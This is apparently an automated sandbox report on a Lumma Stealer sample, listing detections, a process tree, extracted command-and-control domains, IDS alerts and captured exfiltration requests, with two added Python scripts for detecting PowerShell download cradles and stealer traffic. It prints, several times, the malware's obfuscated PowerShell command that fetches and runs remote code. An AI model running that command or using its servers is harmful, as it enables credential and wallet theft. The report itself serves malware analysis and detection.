
Windows Analysis Report
setup.exe

Overview

General Information

Sample name: setup.exe
Analysis ID: 1585368
MD5: 76f2e89ace5c9b36679ce13b57c8b752
SHA1: 736b004b46dfb5d0fef7758406883a22f15b1649
SHA256: 16c3793c3deafcfb489b2347d08bfd0a420ce0f8c27dd4afeea05d9d9a99f413
Tags: exe, LummaStealer, user-aachum

Detection

LummaC
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • setup.exe (PID: 5916 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: 76F2E89ACE5C9B36679CE13B57C8B752)
    • powershell.exe (PID: 7332 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Extracted malware configuration (LummaC): {"C2 url": ["rabidcowse.shop", "cloudewahsj.shop", "wholersorie.shop", "nearycrepso.shop", "tirepublicerj.shop", "fairiespar.cyou", "abruptyopsn.shop", "noisycuttej.shop", "framekgirus.shop"], "Build id": "hRjzG3--ALFA"}
Yara matches (Source: Rule, Description, Author, matched strings)
  • sslproxydump.pcap: JoeSecurity_LummaCStealer_3, Yara detected LummaC Stealer, Joe Security
  • sslproxydump.pcap: JoeSecurity_LummaCStealer_2, Yara detected LummaC Stealer, Joe Security
  • 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmp: Windows_Trojan_Donutloader_f40e3759, description unknown, author unknown; matched string 0x5179f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
  • 00000000.00000003.1417442248.00000000008D1000.00000004.00000020.00020000.00000000.sdmp: JoeSecurity_CredentialStealer, Yara detected Credential Stealer, Joe Security
  • 00000000.00000003.1417555343.0000000000888000.00000004.00000020.00020000.00000000.sdmp: JoeSecurity_CredentialStealer, Yara detected Credential Stealer, Joe Security
  • Process Memory Space: setup.exe PID: 5916: JoeSecurity_LummaCStealer_3, Yara detected LummaC Stealer, Joe Security
  • Process Memory Space: setup.exe PID: 5916: JoeSecurity_CredentialStealer, Yara detected Credential Stealer, Joe Security

              System Summary

Source: Process started. Six Sigma rules matched the same process-creation event; rule authors as listed in the report:
  • Florian Roth (Nextron Systems)
  • Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
  • frack113
  • Florian Roth (Nextron Systems)
  • James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
  • Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data (identical for all six matches):
  Command / CommandLine / ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -
  CommandLine|base64offset|contains: ^
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\setup.exe"
  ParentImage: C:\Users\user\Desktop\setup.exe
  ParentProcessId: 5916
  ParentProcessName: setup.exe
  ProcessId: 7332
  ProcessName: powershell.exe
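The command line recorded in these Sigma matches shows the traits that make a PowerShell download cradle stand out in process-creation telemetry: an execution-policy bypass, a forced TLS 1.2 protocol, a web request whose URL carries the victim hostname, `IEx` over the response body, a 32-bit (SysWOW64) PowerShell host spawned by a Desktop executable, and identifier case randomised to defeat naive string matching. The following triage script is an added example, not part of the Joe Sandbox report or of any Sigma rule; its regexes approximate the intent of the rules named above rather than reproducing their detection blocks, the event keys mirror the Sigma data fields shown, and the second (benign) event is invented as a control.

```python
"""Triage of process-creation events for obfuscated PowerShell download cradles.

Added example: the regexes below approximate the intent of the Sigma rules that
fired on this sample; they are not the rules' own detection blocks.
"""
from __future__ import annotations
import re

# These run against the lower-cased command line.
DOWNLOAD = re.compile(
    r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|curl|wget)\b"  # curl/wget alias iwr in Windows PowerShell 5.1
    r"|downloadstring|downloadfile|downloaddata|net\.webclient"
)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b")
POLICY_BYPASS = re.compile(r"-(executionpolicy|exec|ex|ep)\s+(bypass|unrestricted)")
TLS_OVERRIDE = re.compile(r"servicepointmanager\]::securityprotocol")
HOST_LEAK = re.compile(r"\$env:(computername|username|userdomain)")

# Case mangling runs against the original command line with quoted strings removed,
# so product names inside a user agent (AppleWebKit, KHTML) do not count. Two
# capitals followed by a lower-case letter ("SEcURiTy") or a four-letter
# upper/lower alternation ("yPrO") are rare in hand-written PowerShell but appear
# in bulk when an obfuscator randomises identifier case.
QUOTED = re.compile(r"'[^']*'|\"[^\"]*\"")
MANGLED = re.compile(r"[A-Z]{2}[a-z]|[a-z][A-Z][a-z][A-Z]")


def case_mangling_score(cmdline: str) -> int:
    return len(MANGLED.findall(QUOTED.sub("''", cmdline)))


def analyze(event: dict) -> list[str]:
    """Return the names of the heuristics that fire on one process-creation event."""
    cmd = event.get("CommandLine", "")
    low = cmd.lower()
    image = event.get("Image", "").lower()
    hits: list[str] = []
    if "powershell" not in image and not low.startswith("powershell"):
        return hits
    downloads = DOWNLOAD.search(low) is not None
    executes = EXECUTE.search(low) is not None
    if downloads and executes:
        hits.append("download_cradle")              # fetch and run in memory
    elif downloads:
        hits.append("web_download")
    if POLICY_BYPASS.search(low):
        hits.append("insecure_execution_policy")
    if TLS_OVERRIDE.search(low):
        hits.append("tls_protocol_override")        # usual prelude to an HTTPS fetch
    if downloads and HOST_LEAK.search(low):
        hits.append("host_fingerprint_in_request")  # hostname sent to the staging server
    if case_mangling_score(cmd) >= 3:
        hits.append("case_mangled_identifiers")
    if "\\syswow64\\" in image:
        hits.append("wow64_powershell")             # 32-bit host, as spawned by a 32-bit parent
    return hits


def triage(events: list[dict]) -> dict[int, list[str]]:
    return {e["ProcessId"]: analyze(e) for e in events}


# Constructed sample: the first event reproduces the command line and image paths
# from the Sigma matches above (PID 7332); the second is an invented benign run.
SAMPLE_EVENTS = [
    {
        "ProcessId": 7332,
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Users\user\Desktop\setup.exe",
        "CommandLine": (
            "powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = "
            "[Net.SecUriTyprOtocoltYPe]::tLs12; "
            "$gD='https://dfgh.online/invoker.php?compName='+$env:computername; "
            "$pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; "
            "Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; "
            "IEx $Ptsr.Content; -"
        ),
    },
    {
        "ProcessId": 4242,  # hypothetical control event
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\scripts\Update-Inventory.ps1",
    },
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, hits or "clean")
```

Case normalisation is what keeps the cmdlet and policy checks honest against this sample; the mangling score is a separate signal and is deliberately computed on the unnormalised text, because the obfuscation itself is the evidence. Feed the same dictionaries from Sysmon Event ID 1 or Security 4688 records and the output is a per-PID list of the heuristics that fired.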
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-07T15:26:18.078230+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49726 | 188.114.97.3 | 443 | TCP
2025-01-07T15:26:19.141494+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49732 | 188.114.97.3 | 443 | TCP
2025-01-07T15:26:20.232927+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49742 | 188.114.97.3 | 443 | TCP
2025-01-07T15:26:21.479323+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49749 | 188.114.97.3 | 443 | TCP
2025-01-07T15:26:22.665292+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49760 | 188.114.97.3 | 443 | TCP
2025-01-07T15:26:24.288140+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49772 | 188.114.97.3 | 443 | TCP
2025-01-07T15:26:25.484416+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49779 | 188.114.97.3 | 443 | TCP
2025-01-07T15:26:30.959508+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49816 | 188.114.97.3 | 443 | TCP
2025-01-07T15:26:32.302034+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49823 | 185.161.251.21 | 443 | TCP
2025-01-07T15:26:18.576159+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49726 | 188.114.97.3 | 443 | TCP
2025-01-07T15:26:19.583691+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49732 | 188.114.97.3 | 443 | TCP
2025-01-07T15:26:31.425192+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49816 | 188.114.97.3 | 443 | TCP
2025-01-07T15:26:18.576159+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49726 | 188.114.97.3 | 443 | TCP
2025-01-07T15:26:19.583691+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49732 | 188.114.97.3 | 443 | TCP
2025-01-07T15:26:20.821930+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49742 | 188.114.97.3 | 443 | TCP


              AV Detection

Source: https://klipvumisui.shop/c& | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop:443/int_clp_sha.txtg0lh | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop:443/int_clp_sha.txt | Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txt? | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtIe | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/) | Avira URL Cloud: Label: malware
Source: https://dfgh.online/invoker.php?compName=hZ | Avira URL Cloud: Label: malware
Source: setup.exe.5916.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["rabidcowse.shop", "cloudewahsj.shop", "wholersorie.shop", "nearycrepso.shop", "tirepublicerj.shop", "fairiespar.cyou", "abruptyopsn.shop", "noisycuttej.shop", "framekgirus.shop"], "Build id": "hRjzG3--ALFA"}
Source: setup.exe | ReversingLabs: Detection: 15%
Source: setup.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49760 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49772 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49779 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49816 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.7:49823 version: TLS 1.2

              Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49726 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49726 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49732 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49732 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49742 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49816 -> 188.114.97.3:443
Source: Malware configuration extractor | URLs: rabidcowse.shop
Source: Malware configuration extractor | URLs: cloudewahsj.shop
Source: Malware configuration extractor | URLs: wholersorie.shop
Source: Malware configuration extractor | URLs: nearycrepso.shop
Source: Malware configuration extractor | URLs: tirepublicerj.shop
Source: Malware configuration extractor | URLs: fairiespar.cyou
Source: Malware configuration extractor | URLs: abruptyopsn.shop
Source: Malware configuration extractor | URLs: noisycuttej.shop
Source: Malware configuration extractor | URLs: framekgirus.shop
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 185.161.251.21
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49726 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49742 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49732 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49772 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49760 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49779 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49749 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49816 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49823 -> 185.161.251.21:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: fairiespar.cyou
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 78
    Host: fairiespar.cyou
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=TYDIAY273
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12789
    Host: fairiespar.cyou
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=Q61JI54KSSXTH9
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15051
    Host: fairiespar.cyou
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=AHNCTC1XIG648DU
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20382
    Host: fairiespar.cyou
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=HGEE2DGAOBV12WIIPM8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1250
    Host: fairiespar.cyou
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=O7VDALVF2KL0A50MGLZ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1110
    Host: fairiespar.cyou
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 113
    Host: fairiespar.cyou
Source: global traffic | HTTP traffic detected:
    GET /8574262446/ph.txt HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: cegu.shop
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 occurrences)
Source: global traffic | HTTP traffic detected:
    GET /8574262446/ph.txt HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: cegu.shop
Source: global traffic | DNS traffic detected: DNS query: fairiespar.cyou
Source: global traffic | DNS traffic detected: DNS query: cegu.shop
Source: global traffic | DNS traffic detected: DNS query: klipvumisui.shop
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: fairiespar.cyou
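The captured requests to fairiespar.cyou follow a shape worth encoding as detection logic rather than as a domain list: every POST goes to a single path (/api), the first one carries an 8-byte form-urlencoded body, and bulk multipart uploads with bare alphanumeric boundaries follow under a Chrome/119 user agent. Note that the user agent here is a Chrome string, not the "TeslaBrowser/5.5" string from the Malpedia description above, so matching on that string alone would miss this sample; a Chrome user agent paired with a multipart boundary that is not of Chromium's `----WebKitFormBoundary` + 16 alphanumerics form is a more durable inconsistency. The script below is an added example and not part of the report; the thresholds and the boundary check are its own heuristics, the request heads reproduce the headers recorded above, and the last request (a well-formed Chrome upload to the invented host files.example.test) is a constructed control.

```python
"""Assess captured HTTP request heads for stealer-style check-in and upload.

Added example. The thresholds and the boundary check are this example's own
heuristics; the sample requests reproduce the headers recorded in the report,
plus one constructed benign upload to an invented host.
"""
from __future__ import annotations
import re
from collections import defaultdict

# Chromium emits "----WebKitFormBoundary" + 16 alphanumerics for multipart posts.
# A Chrome user agent paired with any other boundary style is a client that only
# claims to be Chrome.
WEBKIT_BOUNDARY = re.compile(r"^----WebKitFormBoundary[A-Za-z0-9]{16}$")
FORM = "application/x-www-form-urlencoded"


def parse_request(raw: str) -> dict:
    """Parse one request head (request line plus headers) into a flat dict."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    ctype = headers.get("content-type", "")
    m = re.search(r"boundary=([^;\s]+)", ctype)
    return {
        "method": method,
        "path": path,
        "host": headers.get("host", ""),
        "ua": headers.get("user-agent", ""),
        "ctype": ctype,
        "length": int(headers.get("content-length", "0") or 0),
        "boundary": m.group(1) if m else None,
    }


def assess_host(requests: list[dict]) -> dict:
    """Score one host's request sequence (requests in capture order)."""
    posts = [r for r in requests if r["method"] == "POST"]
    paths = {r["path"] for r in posts}
    tiny_forms = [r for r in posts if r["ctype"].startswith(FORM) and r["length"] <= 16]
    uploads = [r for r in posts if r["ctype"].startswith("multipart/form-data")]
    fake_chrome = [r for r in uploads
                   if "Chrome/" in r["ua"] and not WEBKIT_BOUNDARY.match(r["boundary"] or "")]
    findings = []
    if len(paths) == 1 and len(posts) >= 3:
        findings.append("single_endpoint_beacon")   # every POST goes to one path
    if tiny_forms and uploads and posts.index(tiny_forms[0]) < posts.index(uploads[0]):
        findings.append("checkin_then_upload")      # tiny form body precedes bulk multipart uploads
    if fake_chrome:
        findings.append("chrome_ua_non_webkit_boundary")
    return {"posts": len(posts),
            "upload_bytes": sum(r["length"] for r in uploads),
            "findings": findings}


def assess(raw_requests: list[str]) -> dict[str, dict]:
    by_host: dict[str, list[dict]] = defaultdict(list)
    for raw in raw_requests:
        req = parse_request(raw)
        by_host[req["host"]].append(req)
    return {host: assess_host(reqs) for host, reqs in by_host.items()}


UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")


def _post(host: str, ctype: str, length: int) -> str:
    return (f"POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: {ctype}\r\n"
            f"User-Agent: {UA}\r\nContent-Length: {length}\r\nHost: {host}\r\n")


# Constructed from the request heads recorded in the report, in capture order,
# followed by one invented benign Chrome upload as a control.
SAMPLE_REQUESTS = [
    _post("fairiespar.cyou", FORM, 8),
    _post("fairiespar.cyou", FORM, 78),
    _post("fairiespar.cyou", "multipart/form-data; boundary=TYDIAY273", 12789),
    _post("fairiespar.cyou", "multipart/form-data; boundary=Q61JI54KSSXTH9", 15051),
    _post("fairiespar.cyou", "multipart/form-data; boundary=AHNCTC1XIG648DU", 20382),
    _post("fairiespar.cyou", "multipart/form-data; boundary=HGEE2DGAOBV12WIIPM8", 1250),
    _post("fairiespar.cyou", "multipart/form-data; boundary=O7VDALVF2KL0A50MGLZ", 1110),
    _post("fairiespar.cyou", FORM, 113),
    f"GET /8574262446/ph.txt HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: {UA}\r\nHost: cegu.shop\r\n",
    ("POST /upload HTTP/1.1\r\nHost: files.example.test\r\n"  # hypothetical benign host
     "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW9\r\n"
     f"User-Agent: {UA}\r\nContent-Length: 4096\r\n"),
]

if __name__ == "__main__":
    for host, verdict in assess(SAMPLE_REQUESTS).items():
        print(host, verdict)
```

The per-host grouping matters because the C2 domains in the extracted configuration rotate; the behaviour (one endpoint, a check-in, then uploads whose total here exceeds 50 KB) is what survives a domain change. Over a real capture, feed the request heads as reassembled from the TLS-intercepting proxy (the report's sslproxydump.pcap) rather than from the wire, since all of this traffic is inside TLS 1.2.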
              Source: setup.exeString found in binary or memory: Http://Www.SkyGz.Com
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: setup.exeString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: setup.exeString found in binary or memory: http://crl.starfieldtech.com/repository/0
              Source: setup.exeString found in binary or memory: http://crl.starfieldtech.com/repository/sfsroot.crl0P
              Source: setup.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: setup.exeString found in binary or memory: http://ocsp.starfieldtech.com/0D
Source: setup.exe | String found in binary or memory: http://ocsp.thawte.com0
Source: setup.exe | String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: setup.exe | String found in binary or memory: http://s2.symcb.com0
Source: powershell.exe, 0000000A.00000002.1515220136.0000000004ED4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: setup.exe | String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: setup.exe | String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: setup.exe | String found in binary or memory: http://sf.symcd.com0&
